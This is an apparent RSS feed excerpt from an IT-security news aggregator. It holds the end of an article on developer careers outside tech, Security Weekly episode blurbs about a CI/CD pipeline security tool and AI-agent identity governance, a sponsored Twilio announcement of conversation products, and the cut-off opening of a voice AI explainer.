<p>“One significant function where we’ve been placing developer talent lately is in developing business systems and internal applications,” Erhard says. These roles often have titles such as systems engineer or application developer, and professionals are hired to handle tasks such as customizing customer relationship management (CRM) or enterprise resource planning (ERP) platforms, building workflow automation tools or modernizing legacy systems, he says.</p>



<p>Other core functions for which Summit Search Group has placed a lot of developers include data, analytics, and AI-enablement. “That could be directly involved with <a href="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html">data engineering</a> or in building tools like reporting systems and <a href="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html">ETL [extract, transform, load]</a> pipelines,” Erhard says.</p>



<p>The firm also has handled searches for developers who can build and maintain customer-facing products for banking, healthcare, and retail companies, such as mobile apps or digital platforms customers can use to interact with companies.</p>



<p>Randstad Digital, a provider of global technology talent, sees demand for roles including web developers, system developers, and app developers. “These professionals would work on anything from customer-facing platforms to internal tools,” says <a href="https://www.linkedin.com/in/mpmorris36/" data-type="link" data-id="https://www.linkedin.com/in/mpmorris36/">Michael Morris</a>, global head of platform and talent at the company. “Non-tech companies are also often hiring roles like software architecture and <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html" data-type="link" data-id="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">devops</a> to help scale existing technology. These involve being more ingrained in the business, like building a supply chain system for a retailer, rather than creating individual tech products like you would at a technology company.”</p>



<h2 class="wp-block-heading">Prep for success</h2>



<p>To increases the chances of success at landing developer jobs outside of the tech industry, development professionals would be wise to follow some good practices.</p>



<h3 class="wp-block-heading">Boost AI skills</h3>



<p>One best practice is to boost skills in using AI-powered tools and get familiar with all things AI.</p>



<p>“Get fluent with AI-assisted development and its limits,” Awasthi says. “This is not optional. Organizations across every sector expect developers to use AI coding tools productively. But the more durable skill is knowing when AI output is wrong, incomplete, or unsuitable for a regulated context. That critical evaluation capacity is what non-tech employers are increasingly trying to hire.”</p>



<p>AI does not necessarily replace the need for human developers so much as it changes the skills profile for those roles, Erhard says. “The biggest difference in recent years is that AI literacy is now a non-negotiable,” he says. “At minimum, developers today need to understand concepts like <a href="https://www.infoworld.com/article/4122440/what-is-prompt-engineering-the-art-of-ai-orchestration.html" data-type="link" data-id="https://www.infoworld.com/article/4122440/what-is-prompt-engineering-the-art-of-ai-orchestration.html">prompt engineering</a> and how to use AI tools to improve their efficiency.”</p>



<p>One thing many job candidates don’t expect is that the rise of AI has also increased the importance of high-level skills such as problem framing, system design, and cross-functional communication,” Erhard says. “Essentially, if something is related to development but too complex or nuanced for an AI to handle effectively, then the demand is high for human developers who have that expertise,” he says.</p>



<p>Candidates who land roles consistently have experience building AI-augmented workflows along with standard coding skills, Erhard says. “Employers increasingly expect to hire developers who can leverage AI, so demonstrating this experience on your résumé can be very beneficial,” he says.</p>



<h3 class="wp-block-heading">Gain domain knowledge</h3>



<p>Summit Search Group is seeing high demand for developers with deep domain knowledge in an organization’s specific industry. “So, for instance, if someone is both an experienced developer and has expertise in healthcare compliance, or financial regulations, then those candidates tend to be very sought after,” Erhard says.</p>



<p>Domain fluency is an underrated skill, Awasthi says. “A developer who understands healthcare compliance, financial regulation, or manufacturing process logic is significantly harder to replace than one who only writes clean code,” she says. “AI can generate boilerplate. It cannot navigate a HIPAA audit or explain a model’s output to a compliance officer.”</p>



<p>Development professionals should “pick an industry and learn it seriously; not just the technology stack but the regulatory environment, the business model, and the actual problems practitioners face,” Awasthi says. “A developer who has read about HIPAA, or spent time understanding credit risk, is immediately more valuable in those hiring contexts.”</p>



<p>It’s also vital to demonstrate real-world, practical application of skills, not just credentials. “The strongest candidates have projects in their portfolio that directly tie to and solve real business problems,” Erhard says.</p>



<h3 class="wp-block-heading">Acquire soft skills</h3>



<p>And then there are the soft skills that are becoming more of a differentiator than they were in the past. As AI handles more routine coding, human developers are expected to make more architectural decisions and collaborate across departments, Erhard says. “Strong communication and problem-solving skills are critical for many of the developer roles that we’re filling today,” he says.</p>



<p>While technical skills are still relevant for developers using and managing AI tools, “they also need to develop the skill of ‘deeper thinking’ and learn how to think one step ahead,” Morris says. “This includes skills like system design mastery—understanding the macro view and learning how <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html" data-type="link" data-id="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a>, databases, and third-party APIs interact securely and efficiently.”</p>



<p>They also should become deeply fluent in the AI coding tools commonly used in their particular industry, with a strong understanding of how to prompt them for optimal output, Morris says. Product context awareness is also useful. “AI doesn’t know what the customer wants, but you do,” Morris says. “Understanding the business problem and the end-user experience is a requirement for being able to guide LLMs.”</p>



<h3 class="wp-block-heading">Master debugging and incident response</h3>



<p>Developers looking to break into non-tech sectors also should develop skills in debugging and incident response, Morris says. “Complex systems with multiple AI agents can, and will, fail, which means companies need humans to trace logic flaws to get the system back on track,” he says. “A mastery of root-cause analysis is a critical skill.”</p>



<p>“Security, compliance, and reliability are very important in non-tech industries like finance and healthcare,” says <a href="https://www.linkedin.com/in/rohit-agarwal/" data-type="link" data-id="https://www.linkedin.com/in/rohit-agarwal/">Rohit Agarwal</a>, co-founder of Zenius, a remote hiring company. “So employers want developers who also know regulatory environments well.”</p>



<h3 class="wp-block-heading">Network and keep learning</h3>



<p>To successfully pivot from jobs at tech companies, “continuous learning, upskilling, and building hybrid skills that combine technical and business knowledge are essential,” Morris says. “With the right preparation, tech professionals can adapt and continue to thrive in meaningful, dynamic careers.”</p>



<p>It’s also a good idea to join talent communities in fields of interest and “engage with other members in conversations that increase your knowledge through the collective intelligence of the community,” Morris says. “Take advantage of AI skilling opportunities relevant for your role, or better yet, where you want to go next. Experiment with the technology either on your own or through structured programs.” Ultimately, be curious and proactive, he says.</p>



<p>“I’d also recommend developers not to ignore referrals, direct outreach, and industry-specific communities during job search,” Agarwal says. “There are often a lot more opportunities available than the ones posted online.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hungry? We talk Smoked Meat, Poutine, and Bagel - also, Identiverse Interviews! - John Pritchard, Cassie Christensen, Jaime Lewis-Gross, François Proulx, Kim Brown - ESW #467]]></title>
<description><![CDATA[Interview with François Proulx from Boost Security Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine. Today, we discuss their latest tool, Smoked Meat. They describe it as "L...]]></description>
<link>https://tsecurity.de/de/3664752/it-security-nachrichten/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-john-pritchard-cassie-christensen-jaime-lewis-gross-franois-proulx-kim-brown-esw-467/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664752/it-security-nachrichten/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-john-pritchard-cassie-christensen-jaime-lewis-gross-franois-proulx-kim-brown-esw-467/</guid>
<pubDate>Mon, 13 Jul 2026 11:21:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Interview with François Proulx from Boost Security</h3> <p><strong>Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation</strong></p> <p>Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine. Today, we discuss their latest tool, Smoked Meat. They describe it as "Like Metasploit, but for CI/CD pipelines".</p> <p>Segment Resources:</p> <ul> <li>Smoked Meat <a rel="noopener" target="_blank" href="https://labs.boostsecurity.io/articles/introducing-smokedmeat">announcement</a></li> <li>Smoked Meat <a rel="noopener" target="_blank" href="https://github.com/boostsecurityio/smokedmeat">github</a></li> <li>Smoked <a rel="noopener" target="_blank" href="https://www.youtube.com/watch?v=F5Hr_201Au8">Meat demo</a> with Guillaume and François</li> </ul> <h3>Identiverse Interview with Dr. John Prichard from Radiant Logic</h3> <p><strong>The Three Identity Problem: Surviving Identity Security's Chaotic Era</strong></p> <p>Identity security has entered its chaotic era. Human, non-human, and agentic AI identities no longer just coexist. They form an uncontrolled inheritance chain in which a human creates an agent, the agent spins up service principals, OAuth grants, and role assignments, and that whole chain keeps running long after the human changes roles or leaves. Most of these chains are being spawned by business users on low-code and enterprise AI platforms, outside traditional identity controls and largely invisible to security.</p> <p>In this segment, Radiant Logic CEO Dr. John Pritchard joins us to unpack why this is no longer a visibility problem. It is an observability problem. And it is shifting the center of gravity in identity security from authentication to authorization. Listeners will leave with a clearer view of where their current IAM, IGA, and NHI programs fall short, and a practical lens for governing the rapidly expanding population of AI agents already inside their environments.</p> <p>To go deeper on what John discussed today, watch Radiant Logic's on-demand webinar Identities Under Attack: How Adversaries Exploit the Human-Machine-Agent Divide at <a rel="noopener" target="_blank" href="https://securityweekly.com/radiantlogicidv">https://securityweekly.com/radiantlogicidv</a>.</p> <h3>Identiverse Interview with Cassie Christensen from Saviynt</h3> <p><strong>Everyone Wants an AI Assistant. Few Are Ready to Govern One</strong></p> <p>Explore a growing reality many professionals can relate to: the appeal of using AI agents to handle the work that keeps piling up - from inbox management to research and logistics - and the governance challenges that quickly follow. The real barrier to scaling personal or enterprise AI agents isn't the technology itself, but defining clear roles, access boundaries, oversight, and lifecycle management. As organizations deploy more autonomous AI agents, the same identity frameworks used to govern workforce and non-employee identities must now evolve to manage AI-driven access before scale and risk outpace control.</p> <p>This segment is sponsored by Saviynt. Learn more or get a free demo at <a rel="noopener" target="_blank" href="https://securityweekly.com/saviyntidv">https://securityweekly.com/saviyntidv</a></p> <h3>Identiverse Interview with Jaime Lewis-Gross from Saviynt</h3> <p><strong>From Sales Engineer to Forward Deployed Engineer: The Rise of Hybrid Technical Roles</strong></p> <p>As technology organizations evolve, technical roles are becoming increasingly fluid - particularly at the intersection of product, engineering, and customer success. This conversation explores what it means to be a modern sales engineer and how the role is increasingly expanding into responsibilities often associated with forward deployed engineers: translating complex technical capabilities into real-world outcomes, solving customer challenges in real time, and serving as a critical bridge between product teams and end users. At the center of this evolution is a customer-first mindset - one that prioritizes listening, adaptability, and long-term partnership. As organizations race to innovate, the companies that stand out will be those that remain deeply focused on customer needs while empowering technical teams to operate beyond traditional role boundaries.</p> <p>This segment is sponsored by Saviynt. Learn more or get a free demo at <a rel="noopener" target="_blank" href="https://securityweekly.com/saviyntidv">https://securityweekly.com/saviyntidv</a></p> <h3>Identiverse Interview with Kim Brown from LexisNexis</h3> <p><strong>Stop Identity Fraud: Modern Strategies for Insurance and Healthcare</strong></p> <p>Identity fraud is growing more sophisticated across both insurance and healthcare, making identity management a critical line of defense. In this executive interview, Kim Brown, VP of Product Management, will explore how organizations can strengthen identity verification, authentication, and risk assessment to reduce fraud while improving user experiences. The discussion will highlight emerging threats, evolving regulatory expectations, and practical strategies for deploying identity solutions at scale. Attendees will gain actionable insights to protect customers, patients, and their organizations without adding friction.</p> <p>This segment is sponsored by LexisNexis Risk Solutions. Visit <a rel="noopener" target="_blank" href="https://securityweekly.com/lexisnexisidv">https://securityweekly.com/lexisnexisidv</a> to learn more about them!</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/esw">https://www.securityweekly.com/esw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/esw-467">https://securityweekly.com/esw-467</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hungry? We talk Smoked Meat, Poutine, and Bagel - also, Identiverse Interviews! - ESW #467]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:2 Interview with François Proulx from Boost Security

Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation

Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine....]]></description>
<link>https://tsecurity.de/de/3664747/it-security-video/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-esw-467/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664747/it-security-video/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-esw-467/</guid>
<pubDate>Mon, 13 Jul 2026 11:17:45 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/ywJwPPIWDOU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Interview with François Proulx from Boost Security<br />
<br />
Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation<br />
<br />
Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine. Today, we discuss their latest tool, Smoked Meat. They describe it as "Like Metasploit, but for CI/CD pipelines".<br />
<br />
Segment Resources:<br />
- Smoked Meat announcement: https://labs.boostsecurity.io/articles/introducing-smokedmeat<br />
- Smoked Meat github: https://github.com/boostsecurityio/smokedmeat<br />
- Smoked Meat demo: https://www.youtube.com/watch?v=F5Hr_201Au8 with Guillaume and François<br />
<br />
Dr. John Prichard from Radiant Logic<br />
<br />
The Three Identity Problem: Surviving Identity Security's Chaotic Era<br />
<br />
Identity security has entered its chaotic era. Human, non-human, and agentic AI identities no longer just coexist. They form an uncontrolled inheritance chain in which a human creates an agent, the agent spins up service principals, OAuth grants, and role assignments, and that whole chain keeps running long after the human changes roles or leaves. Most of these chains are being spawned by business users on low-code and enterprise AI platforms, outside traditional identity controls and largely invisible to security.<br />
<br />
In this segment, Radiant Logic CEO Dr. John Pritchard joins us to unpack why this is no longer a visibility problem. It is an observability problem. And it is shifting the center of gravity in identity security from authentication to authorization. Listeners will leave with a clearer view of where their current IAM, IGA, and NHI programs fall short, and a practical lens for governing the rapidly expanding population of AI agents already inside their environments.<br />
<br />
To go deeper on what John discussed today, watch Radiant Logic's on-demand webinar Identities Under Attack: How Adversaries Exploit the Human-Machine-Agent Divide at https://securityweekly.com/radiantlogicidv.<br />
<br />
Cassie Christensen from Saviynt<br />
<br />
Everyone Wants an AI Assistant. Few Are Ready to Govern One<br />
<br />
Explore a growing reality many professionals can relate to: the appeal of using AI agents to handle the work that keeps piling up - from inbox management to research and logistics - and the governance challenges that quickly follow. The real barrier to scaling personal or enterprise AI agents isn’t the technology itself, but defining clear roles, access boundaries, oversight, and lifecycle management. As organizations deploy more autonomous AI agents, the same identity frameworks used to govern workforce and non-employee identities must now evolve to manage AI-driven access before scale and risk outpace control.<br />
<br />
This segment is sponsored by Saviynt. Learn more or get a free demo at https://securityweekly.com/saviyntidv<br />
<br />
Jaime Lewis-Gross from Saviynt<br />
<br />
From Sales Engineer to Forward Deployed Engineer: The Rise of Hybrid Technical Roles<br />
<br />
As technology organizations evolve, technical roles are becoming increasingly fluid - particularly at the intersection of product, engineering, and customer success. This conversation explores what it means to be a modern sales engineer and how the role is increasingly expanding into responsibilities often associated with forward deployed engineers: translating complex technical capabilities into real-world outcomes, solving customer challenges in real time, and serving as a critical bridge between product teams and end users. At the center of this evolution is a customer-first mindset - one that prioritizes listening, adaptability, and long-term partnership. As organizations race to innovate, the companies that stand out will be those that remain deeply focused on customer needs while empowering technical teams to operate beyond traditional role boundaries.<br />
<br />
This segment is sponsored by Saviynt. Learn more or get a free demo at https://securityweekly.com/saviyntidv<br />
<br />
Kim Brown from LexisNexis<br />
<br />
Stop Identity Fraud: Modern Strategies for Insurance and Healthcare<br />
<br />
Identity fraud is growing more sophisticated across both insurance and healthcare, making identity management a critical line of defense. In this executive interview, Kim Brown, VP of Product Management, will explore how organizations can strengthen identity verification, authentication, and risk assessment to reduce fraud while improving user experiences. The discussion will highlight emerging threats, evolving regulatory expectations, and practical strategies for deploying identity solutions at scale. Attendees will gain actionable insights to protect customers, patients, and their organizations without adding friction.<br />
<br />
This segment is sponsored by LexisNexis Risk Solutions. Visit https://securityweekly.com/lexisnexisidv to learn more about them!<br />
<br />
Visit https://www.securityweekly.com/esw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/esw-467<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Infrastructure for the agentic era: A new conversation layer for the Twilio Platform]]></title>
<description><![CDATA[A new era of customer engagement is taking shape. AI agents are quickly becoming integral to the way businesses serve, support, and sell to customers — able to respond, reason, and take action in ways that go far beyond scripted automation.



Many customer journeys, however, are still built on s...]]></description>
<link>https://tsecurity.de/de/3664598/it-security-nachrichten/infrastructure-for-the-agentic-era-a-new-conversation-layer-for-the-twilio-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664598/it-security-nachrichten/infrastructure-for-the-agentic-era-a-new-conversation-layer-for-the-twilio-platform/</guid>
<pubDate>Mon, 13 Jul 2026 10:09:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A new era of customer engagement is taking shape. AI agents are quickly becoming integral to the way businesses serve, support, and sell to customers — able to respond, reason, and take action in ways that go far beyond scripted automation.</p>



<p>Many customer journeys, however, are still built on systems that don’t talk to each other. Customer data lives in one place, channel history in another, and AI agents often operate with only part of the picture. Customers feel the pain when they switch between channels like voice and messaging, get transferred, and have to repeat themselves yet again. It doesn’t matter that they’ve been loyal to a brand for years, every interaction feels like a cold start. That is the conversation gap.</p>



<p>It’s clear that AI isn’t the problem, infrastructure is. Closing the gap requires new building blocks that focus on continuity, so context can carry forward across systems, channels, human agents, and AI agents.</p>



<p>To bridge the gap, at <a href="https://signal.twilio.com/?_gl=1*qsec1h*_gcl_aw*R0NMLjE3Nzk3MTY4MzguQ2p3S0NBanc1c19RQmhBZEVpd0FERF9nQnUyRVR4YTdGTFRCNDVPcktsd2dvbnZrQ3hZdlNtQXRJRHVoS09lOVJySXFsQ3k2eHZZajBob0NRZkVRQXZEX0J3RQ..*_gcl_au*MTAwMjE5MDU2OS4xNzc5MzUyNjYz*_ga*MTA5NDA4OTEuMTc3MTU2MTMzNg..*_ga_RRP8K4M4F3*czE3ODA5NzUwMjYkbzE3NyRnMSR0MTc4MDk3NzU4NiRqNjAkbDAkaDA.&amp;utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="sponsored">SIGNAL 2026</a>, we are introducing a new conversation layer for the Twilio Platform.</p>



<p>Twilio Conversation Orchestrator, Twilio Conversation Memory, and Twilio Conversation Intelligence are now generally available. Together, they help businesses coordinate interactions, preserve context, and connect human and AI agents so every conversation is more continuous and useful.</p>



<p>In addition to the new Conversations layer, we’re also announcing platform updates that make it easier to build, manage, and scale customer engagement on Twilio — from a reimagined Twilio Console to expanded channels and new voice AI capabilities.</p>



<h2 class="wp-block-heading">New building blocks for connected conversations</h2>



<p>The conversation gap does more than create inconsistent customer experiences. It hurts conversion and retention, increases operational costs, adds integration complexity, and makes agents less productive. The new platform capabilities we’re introducing are designed to fix that by coordinating interactions, maintaining context, and surfacing signals as conversations happen.</p>



<h2 class="wp-block-heading"><a></a>Conversation Orchestrator</h2>



<p><a href="https://www.twilio.com/en-us/blog/products/conversation-orchestrator?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="sponsored">Conversation Orchestrator</a> helps businesses coordinate interactions across Twilio channels without complex custom logic. Teams can configure it in Console or configure their implementation with the API. It connects interactions into a single thread and manages handoffs between human agents and automated systems.</p>



<h2 class="wp-block-heading">Conversation Memory</h2>



<p><a href="https://www.twilio.com/en-us/blog/products/launches/conversation-memory?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="noreferrer noopener">Conversation Memory</a> creates a living, identity-resolved profile by connecting customer data with conversation history and customer traits. That means each interaction starts with the right context. It’s built specifically for LLMs to reduce latency and token usage by surfacing the most relevant details when they matter.</p>



<p>A new Enterprise Knowledge API (now generally available) also allows teams to deliver more relevant experiences and ground interactions in trusted business knowledge such as FAQs, policies, and product documentation.</p>



<h2 class="wp-block-heading">Conversation Intelligence</h2>



<p><a href="https://www.twilio.com/en-us/blog/products/launches/conversation-intelligence?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="noreferrer noopener">Conversation Intelligence</a> provides real-time understanding of live interactions. Using prebuilt and custom LLM-based operators, it can detect changes in sentiment, flag potential escalations, and trigger action during a conversation, not only after it ends.</p>



<p>That gives teams the ability to respond sooner, support agents more effectively, and improve customer outcomes while the conversation is still in progress.</p>



<p>Together, these products help businesses create customer experiences that feel more connected across channels.</p>



<h2 class="wp-block-heading">Open by design</h2>



<p>Twilio remains neutral by design. We start with the premise that you know your business. We aren’t here to prescribe a model, framework, or data strategy. We provide the infrastructure that helps you build customer engagement in the way that works best for your business. You pick the model and agent runtime. You own the data.</p>



<p>That doesn’t mean you need to start from scratch, either. We partnered with Microsoft, AWS, and others to create blueprints that support faster development. We are also introducing an open-source developer toolkit, <a href="https://www.twilio.com/en-us/blog/products/launches/agent-connect?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="noreferrer noopener">Twilio Agent Connect</a> (now generally available), that lets your teams connect agents built on any LLM or framework directly to Twilio’s infrastructure.</p>



<p>For developers, this means more flexibility. For businesses, it means less lock-in and the ability to get value from existing investments. For partners, it means more ways to build with Twilio.</p>



<h2 class="wp-block-heading">A new front door</h2>



<p>We are also introducing a reimagined <a href="https://www.twilio.com/en-us/blog/products/launches/new-twilio-console?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="noreferrer noopener">Twilio Console</a>, because as customer engagement grows more complex, managing the infrastructure behind it should feel effortless.</p>



<p>The new Console is a single mission control center that brings your communications, identity, and data into one experience: one login, consistent logs across every surface, an intelligent Console Assistant, transparent billing insights, and streamlined compliance workflows that no longer slow you down.</p>



<p>Over the coming months, we’ll roll out this new Console experience to customers automatically. You can also opt in to gain early access.</p>



<h2 class="wp-block-heading">More channels, more control, smarter conversations</h2>



<p>In addition to these launches, we are announcing several updates that expand customer reach, support enterprise requirements, and make it simpler to build on Twilio.</p>



<ul class="wp-block-list">
<li><a href="https://www.twilio.com/en-us/messaging/channels/apple-messages-for-business?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="sponsored">Apple Messages for Business</a> (Private beta) and Twilio Email (GA) give teams new ways to reach customers on the channels they already use.</li>



<li>Data Residency for SMS (EU) (Public beta) enables teams to manage personal data locally to support regional data requirements.</li>



<li><a href="https://www.twilio.com/en-us/blog/products/launches/the-evolution-of-conversation-relay?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="sponsored">Conversation Relay</a> enhancements add PCI compliance, HIPAA eligibility, Insights, and support for Deepgram Flux for smarter turn detection — helping AI agents better understand when a person has finished speaking.</li>



<li><a href="https://www.twilio.com/en-us/blog/partners/integrations/provision-twilio-communications-channels-stripe-projects?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="sponsored">Stripe Projects integration</a> enables developers and AI agents to seamlessly provision Twilio within Stripe Projects in a single, programmable CLI workflow.</li>
</ul>



<h2 class="wp-block-heading">Built with our customers</h2>



<p>Bringing these new products to life required a close partnership with many beta customers and partners. This helped us understand real-world signals and needs to help make the capabilities robust from the start.</p>



<p>Among dozens of others, Centerfield, Constellation Dealerships, Car Finance 247, and Meera.ai leveraged Twilio to solve their own customer engagement challenges. These teams showed what is possible when businesses carry context forward, act on live conversation signals, and connect AI agents with human teams in the moments that matter.</p>



<p><a href="https://www.carfinance247.co.uk/" target="_blank" rel="noreferrer noopener">Car Finance 247</a>, a leading UK online car finance broker, is using Twilio to help recover stalled loan applications. When customers miss a field, need to correct information, or still need to confirm terms and conditions, AI-powered outreach across voice, SMS, and RCS, Conversation Memory tracks the application state. Conversation Orchestrator manages the outreach journey, and Flex helps bring in a human agent as needed. As Reg Rix, Co-Founder and CEO, shared:</p>



<p><em>“Because the platform remembers where each customer left off, we can pick up right where they stopped, helping them cross the finish line in a way that is modern, responsive, and genuinely helpful.”</em></p>



<p><a href="https://www.centerfield.com/" target="_blank" rel="sponsored">Centerfield</a>, a technology company powering AI-driven commerce, helps brands connect with consumers across digital and phone-based journeys. With Twilio, the team is connecting real-time conversation data with customer context to guide agents and AI systems in the moment, standardise what works, and improve performance at scale. As Aniketh Parmar, Chief Technology Officer, said:</p>



<p><em>“Performance comes down to how well every interaction moves a customer forward. We’re capturing each conversation in real time and applying what we already know about the customer to guide our agents and AI systems in the moment. With the Twilio Platform, including Conversation Orchestrator, Conversation Memory, and Conversation Intelligence, we can see what’s driving conversations so we can standardise what works, eliminate what doesn’t, and continuously improve outcomes at scale.”</em></p>



<p><a href="https://constellationdealer.com/" target="_blank" rel="sponsored">Constellation Dealerships</a> is using Twilio’s agent infrastructure to accelerate AI-powered engagement across its dealer network, moving from evaluation to measurable outcomes in days. As Richard Pineault, Director of R&amp;D, shared:</p>



<p><em>“The value of this partnership is evident—our team progressed from evaluating Twilio’s agent infrastructure to realising measurable outcomes within days. This rapid speed-to-value exemplifies the agility and innovation required to propel the dealership industry into the future.”</em></p>



<p><a href="http://meera.ai/" target="_blank" rel="sponsored">Meera.ai </a>is building on Twilio to modernise outbound engagement, replacing repeated manual follow-ups with always-on conversations across voice, SMS, and messaging. Vivek Zaveri, Chief Executive Officer, said:</p>



<p><em>“Meera.ai has partnered with Twilio since our inception to champion a conversation-first future for commerce. As the industry shifts toward real-time LLM-enabled interactions, Twilio’s Platform and the new Conversations products will help us reach customers in the moment.”</em></p>



<p>Together, these customers and partners show that the Twilio Platform can help businesses recover stalled journeys, improve live interactions, accelerate time to value, and create more connected experiences across AI agents, human teams, and every customer channel.</p>



<h2 class="wp-block-heading">The next era of customer engagement starts here</h2>



<p>As AI agents own more of customer engagement, businesses need infrastructure that keeps conversations connected across channels, systems, and teams. That means preserving context, coordinating handoffs, and acting on what is happening in real time.</p>



<p>That is what we are building with this next generation of the Twilio Platform: a new layer that connects channels, context, intelligence, and human and AI agents, helping businesses make every digital interaction more connected, more useful, and more amazing.</p>



<p>For 17 years, Twilio has helped builders create better ways for businesses to connect with their customers. In this next era, that connection matters more than ever.</p>



<p><a href="https://www.twilio.com/en-us/why-twilio?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_end-cta-infra-agentic-era_brandposthub" target="_blank" rel="noreferrer noopener">Explore the new Conversations layer</a>, try the products, and let’s build what comes next, together.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Voice AI vs conversational AI: What’s the difference?]]></title>
<description><![CDATA[Voice AI. Conversational AI. You’ve seen both terms everywhere—sometimes in the same sentence, sometimes used as if they mean the same thing.



They don’t. But they’re not opposites either.



One is a category of technology. The other is a specific way to deliver it.



Mix them up and you end ...]]></description>
<link>https://tsecurity.de/de/3664597/it-security-nachrichten/voice-ai-vs-conversational-ai-whats-the-difference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664597/it-security-nachrichten/voice-ai-vs-conversational-ai-whats-the-difference/</guid>
<pubDate>Mon, 13 Jul 2026 10:09:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Voice AI. Conversational AI. You’ve seen both terms everywhere—sometimes in the same sentence, sometimes used as if they mean the same thing.</p>



<p>They don’t. But they’re not opposites either.</p>



<p>One is a category of technology. The other is a specific way to deliver it.</p>



<p>Mix them up and you end up making the wrong platform decisions, building the wrong workflows, and losing 45 minutes in a meeting that didn’t need to happen.</p>



<p>Here’s the difference between voice AI and conversational AI, minus the jargon.</p>



<h2 class="wp-block-heading">Conversational AI: The intelligence layer</h2>



